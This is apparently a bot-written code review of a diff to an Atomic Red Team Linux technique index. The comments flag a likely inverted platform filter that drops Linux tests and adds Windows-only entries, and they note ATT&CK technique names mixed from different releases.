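Review bot: `- T1055.014 VDSO Hijacking` is the one Linux-specific technique in this region and it is the line being removed, while the five additions (Parent PID Spoofing, Services File Permissions Weakness, KernelCallbackTable, Compiled HTML File, Network Share Connection Removal) are all Windows-only. If the intent was to filter CONTRIBUTE A TEST entries by platform, the filter looks inverted; if VDSO Hijacking was dropped because it now has a test, it should reappear as a linked `[T1055.014 ...](../../T1055.014/T1055.014.md)` entry with its tests, and nothing in this hunk does that.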
@@ -182,16 +180,23 @@
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on FreeBSD [linux]
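Review bot: the added `T1218.010 Signed Binary Proxy Execution: Regsvr32` and `T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm` use the pre-v11 ATT&CK parent name (T1218 has been System Binary Proxy Execution since April 2022), while the same patch adds `T1484 Domain or Tenant Policy Modification`, which is the v15 name, and keeps `T1070 Indicator Removal on Host`, which is the pre-v12 name. The technique-name source therefore mixes ATT&CK releases; pin the generator to one release and regenerate so names are consistent across the index. The same parent-name inconsistency as in the first hunk shows up here (`T1036.001 Invalid Code Signature` and `T1027.014 Polymorphic Code` omit the parent, `T1134.005 Access Token Manipulation: SID-History Injection` includes it).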
@@ -201,29 +206,45 @@
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- - Atomic Test #2: Space After Filename [macos, linux]
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
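Review bot: this hunk removes two Linux-specific wanted-test entries (`T1055.009 Proc Memory`, `T1055.008 Ptrace System Calls`) and, more importantly, an existing linked test, `[T1036.006 Masquerading: Space after Filename]` with `Atomic Test #2: Space After Filename [macos, linux]`, while adding Windows-only items such as Pass the Hash, DLL Side-Loading, SyncAppvPublishingServer, ListPlanting, NTFS File Attributes and DLL Injection. Unless the T1036.006 test was deleted upstream in the same change, this drops a real Linux test from the index; please confirm against the source YAML and check the platform filter in the generator. Minor: `T1127.002 ClickOnce`, `T1070.010 Relocate Malware` and `T1036.010 Masquerade Account Name` again omit the parent technique name while their neighbours include it.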
@@ -231,90 +252,221 @@
- Atomic Test #11: Login as nobody (Linux) [linux]
- Atomic Test #12: Login as nobody (freebsd) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+ - Atomic Test #2: At - Schedule a job [linux]
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
+ - Atomic Test #8: Create local account (Linux) [linux]
+ - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+ - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+ - Atomic Test #11: Login as nobody (Linux) [linux]
+ - Atomic Test #12: Login as nobody (freebsd) [linux]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# execution
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
+ - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
+ - Atomic Test #2: Execute Python via scripts [linux]
+ - Atomic Test #3: Execute Python via Python executables [linux]
+ - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
+ - Atomic Test #3: psexec.py (Impacket) [linux]
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+ - Atomic Test #2: At - Schedule a job [linux]
# persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- - Atomic Test #1: Malicious PAM rule [linux]
- - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- - Atomic Test #3: Malicious PAM module [linux]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- - Atomic Test #1: Trap EXIT [macos, linux]
- - Atomic Test #2: Trap EXIT (freebsd) [linux]
- - Atomic Test #3: Trap SIGINT [macos, linux]
- - Atomic Test #4: Trap SIGINT (freebsd) [linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
